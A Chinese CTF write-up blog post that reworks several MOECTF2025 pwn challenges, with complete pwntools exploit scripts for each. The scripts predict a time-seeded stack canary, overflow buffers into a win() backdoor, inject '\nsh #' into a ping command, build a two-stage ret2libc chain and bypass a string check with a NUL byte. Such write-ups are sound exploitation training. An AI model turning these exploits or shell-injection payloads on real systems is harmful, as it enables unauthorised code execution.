MOECTF2025复现中


欢迎来到MOECTF2025!

boom

栈上是一个手工实现的 canary（不是编译器插入的那种），程序提供了 win 函数作为后门，题目提示可以用 python 的 ctypes 包调用 libc。

ctypes可以调用C库函数,于是使用ctypes加载libc

init() 中有 v0 = time(0LL)，即用当前时间作为随机数种子，所以本地在同一秒内调用 srand(time)/rand()（脚本中再对 114514 取模）就能算出同样的 canary。前提是远端 libc 的 rand() 实现与本地一致。

char s[124]; // [rsp+0h] [rbp-90h] BYREF

int v5; // [rsp+7Ch] [rbp-14h]

int v6; // [rsp+8Ch] [rbp-4h]

先填充 0x90-0x14 = 124 字节到达 canary（v5），写入 4 字节 canary，再填充 16+8 = 24 字节（到 rbp 的剩余空间加上保存的 rbp）到达返回地址，然后放一个 ret gadget 对齐栈，最后放 win 的地址。

from pwn import *
import ctypes
import time

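CANARY_MOD = 114514      # the binary reduces rand() modulo this value
BACKDOOR = 0x401276      # win() -- the provided backdoor function
RET_GADGET = 0x40101a    # bare `ret`, used to keep rsp 16-byte aligned before win()

# Stack layout from the decompiler: s[124] at rbp-0x90, the 4-byte "canary"
# v5 at rbp-0x14, then 0x10 bytes up to rbp plus 8 bytes of saved rbp.
BUF_TO_CANARY = 0x90 - 0x14      # 124
CANARY_TO_RET = 0x14 - 4 + 8     # 24


def predict_canary(seed):
    """Return the value the binary uses as its hand-rolled canary for ``seed``.

    init() reads time(0) (see the write-up) and, judging by the exploit, feeds
    it to srand(); the canary is then rand() % 114514. Replaying the same two
    calls through the local libc reproduces it. This assumes the remote libc's
    rand() is the same generator as the local libc.so.6 (glibc) -- a different
    libc yields a different sequence.

    Args:
        seed: value passed to srand(), normally the current epoch second.

    Returns:
        int in ``range(CANARY_MOD)``.
    """
    libc = ctypes.CDLL('libc.so.6')
    libc.srand(seed)
    return libc.rand() % CANARY_MOD


def build_payload(canary):
    """Overflow s[] while preserving the canary, then return into win().

    The `ret` gadget placed before win() is presumably there for stack
    alignment (rsp must be 16-byte aligned at the call boundary).
    """
    return (
        b'a' * BUF_TO_CANARY
        + p32(canary)
        + b'a' * CANARY_TO_RET
        + p64(RET_GADGET)
        + p64(BACKDOOR)
    )


def main():
    """Connect, guess the canary from the current second and trigger win()."""
    p = remote('192.168.50.1', 58472)
    #p=process('./pwn')

    # Take the seed right after connecting: the server calls time(0) in init(),
    # and the guess is only right if both sides land in the same second. If the
    # second ticks over in between (or the clocks are skewed) the canary check
    # fails and the script simply has to be re-run.
    canary = predict_canary(int(time.time()))

    p.sendlineafter(b'(y/n)', b'y')
    p.sendlineafter(b'Enter your message: ', build_payload(canary))
    p.interactive()


if __name__ == "__main__":
    main()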

boom_revenge

同上。（为什么要重复几次才成功？原因在于种子：服务端在 init() 里用 time(0) 取种子，而本地脚本用自己的 time.time() 取种子，两边只要不在同一秒——例如时钟有偏差，或者从连接到调用 srand 之间恰好跨过了秒边界——算出来的 canary 就不一样；重试直到两边落在同一秒就成功了。另外前提是远端 libc 的 rand() 实现与本地一致。）

from pwn import *
import ctypes
import time
p = remote('192.168.50.1', 62171)
#p=process('./pwn')

# Same trick as "boom": the canary is rand() % 114514 seeded from time(0), so
# replay srand()/rand() through the local libc with the current second. The
# guess is only right when the local second matches the server's time(0), so
# a failed attempt just has to be repeated.
libc = ctypes.CDLL('libc.so.6')
libc.srand(int(time.time()))
canary = libc.rand() % 114514

backdoor = 0x401276     # win()
ret = 0x40101a          # `ret` gadget, presumably for stack alignment before win()

# 124 bytes of buffer, the 4-byte canary, 24 bytes up to the return address,
# then the alignment gadget and the backdoor address.
chunks = [
    b'a' * 124,
    p32(canary),
    b'a' * 24,
    p64(ret),
    p64(backdoor),
]
payload = b''.join(chunks)

p.sendlineafter(b'(y/n)', b'y')
p.sendlineafter(b'Enter your message: ', payload)
p.interactive()

inject

这是Rust写的吗

方法一：输入 \nsh #。换行注入一条新的 sh 命令，再用 # 把程序拼在后面的 -c 4 注释掉。根本原因是程序把用户输入的 host 直接拼进 shell 命令行执行。

方法二：输入 \nsh -c sh。拼接后的命令变成 ping \nsh -c sh -c 4，第一个 sh 执行命令字符串 sh，多余的 -c 4 只是作为位置参数传给它，于是由第一个 sh 启动第二个 sh。

from pwn import *
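#p=process('./pwn')
p = remote('192.168.50.1', 52971)

# Menu option 4 is the ping feature; the host we enter is concatenated into a
# shell command line to which the binary appends "-c 4" (see the write-up).
# Send bytes rather than str(4) so the script does not rely on pwntools'
# implicit encoding.
p.sendlineafter(b'Your choice: ', b'4')

# Newline injection: the leading "\n" ends the ping command, "sh" runs as a
# second command, and the trailing "#" comments out the appended "-c 4".
# Alternative that also works: b"\nsh -c sh" -- the appended "-c 4" then only
# becomes positional arguments of the outer sh, which spawns another sh.
# (The original listing left both assignments commented out, so `payload`
# was undefined; one of them must be active.)
payload = b"\nsh #"
#payload = b"\nsh -c sh"

# send(), not sendline(), as in the original -- the payload is delivered as-is.
p.sendafter(b'Enter host to ping: ', payload)
p.interactive()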

ezlibc

开启了 PIE。程序会把 read 的地址打印出来：由于延迟绑定，第一次打印出的地址落在程序自身的映射里（脚本中减去 0x1060 得到 PIE 基址），但拿不到 libc 基址；于是把返回地址改成 _start 再跑一遍，此时 read 已经被调用过、GOT 已解析，第二次打印的就是 libc 里 read 的真实地址，减去符号偏移得到 libc 基址，然后 ret2libc。

现在你掌握ret2libc了

from pwn import*
context.log_level = 'debug'
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
p = remote("192.168.50.1", 65064)

PIE_READ_SLOT = 0x1060   # offset, inside the binary, of the address printed on the first run
PIE_START = 0x10c0       # _start: returning here runs the program a second time
PIE_RET = 0x101a         # `ret` gadget in the binary, for 16-byte stack alignment
LIBC_POP_RDI = 0x2a3e5   # pop rdi ; ret in the provided libc.so.6
PAD = 40                 # bytes from the input buffer to the saved return address


def leak_address():
    """Read the 14-character '0x...' address the program prints after 'use '."""
    p.recvuntil("use ")
    return int(p.recv(14), 16)


# Stage 1: before read() has ever been called the printed address is
# PIE-relative (lazy binding, see the write-up), so it gives the PIE base.
# Overwrite the return address with _start to get a second run.
pie_base = leak_address() - PIE_READ_SLOT
start = pie_base + PIE_START
p.send(b"A" * PAD + p64(start))

# Stage 2: read() has now been resolved, so the same print leaks its libc
# address; derive libc base and the ret2libc gadgets from it.
libc_base = leak_address() - libc.symbols['read']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
pop_rdi = libc_base + LIBC_POP_RDI
ret = pie_base + PIE_RET

rop = b"a" * PAD
rop += p64(pop_rdi) + p64(bin_sh)
rop += p64(ret)            # realign the stack before the call into system()
rop += p64(system)
p.send(rop)
p.interactive()

randomlock

猜测 seed 是 1：程序 srand(1) 之后每轮取 rand() % 10000 作为密码，本地用 ctypes 调同一个 libc 复现这个序列，连答 10 轮即可（前提同样是远端 rand() 实现与本地一致）。

from pwn import *
import ctypes

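ROUNDS = 10       # number of codes the lock asks for
MODULUS = 10000   # each code is rand() % MODULUS


def predict_codes(seed=1, rounds=ROUNDS):
    """Reproduce the lock's code sequence with the local C library.

    The write-up guesses the program calls srand(1) and then rand() % 10000
    for every round, so the same calls through ctypes yield the same numbers.
    This assumes the remote libc's rand() is the same implementation as the
    local libc.so.6 (glibc); a different libc gives a different sequence.

    Args:
        seed: value passed to srand().
        rounds: how many rand() draws to return.

    Returns:
        list[int] of ``rounds`` codes, each in ``range(MODULUS)``.
    """
    libc = ctypes.CDLL("libc.so.6")
    libc.srand(seed)
    return [libc.rand() % MODULUS for _ in range(rounds)]


def main():
    """Connect to the challenge and answer every round with the predicted code."""
    p = remote('192.168.50.1', 62581)

    # The original listing lost its indentation (the loop body was flush with
    # the `for`); this is the intended structure.
    p.recvuntil(b">")
    codes = predict_codes(1, ROUNDS)
    for i, code in enumerate(codes):
        p.sendline(str(code).encode())
        # Judging by the original script, no further ">" prompt follows the
        # last answer, so waiting for one there would hang.
        if i < ROUNDS - 1:
            p.recvuntil(b">")

    print(p.recvall())


if __name__ == "__main__":
    main()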

str_check

利用 \x00 截断字符串：只要前 4 个字节是 meow 且紧跟一个 \x00，字符串比较就会通过，而 \x00 之后的数据仍然写进栈里，填充到返回地址后写入后门地址。

from pwn import *
context.log_level = 'debug'
p = remote('192.168.50.1', 53500)
#p=process('./pwn')
elf = ELF('./pwn')

BACKDOOR = 0x40123b
# Distance from the start of the input to the saved return address
# (0x20 + 8 in the original; presumably the buffer plus the saved rbp).
RET_OFFSET = 0x20 + 8

# The check only sees the C string, so "meow" followed by a NUL byte passes
# it; the bytes after the terminator are invisible to the comparison but still
# overwrite the stack up to the return address.
payload = b'meow\x00'
payload = payload.ljust(RET_OFFSET, b'a')
payload += p64(BACKDOOR)

p.sendlineafter(b'say?', payload)
p.sendlineafter('?', b'200')
p.interactive()

syslock

to be continued

  • Title: MOECTF2025复现中
  • Author: Snowcat
  • Created at : 2026-01-26 12:00:00
  • Updated at : 2026-01-30 20:53:10
  • Link: https://sadsnowcat.github.io/2026/01/26/MOECTF2025复现中/
  • License: This work is licensed under CC BY-NC-SA 4.0.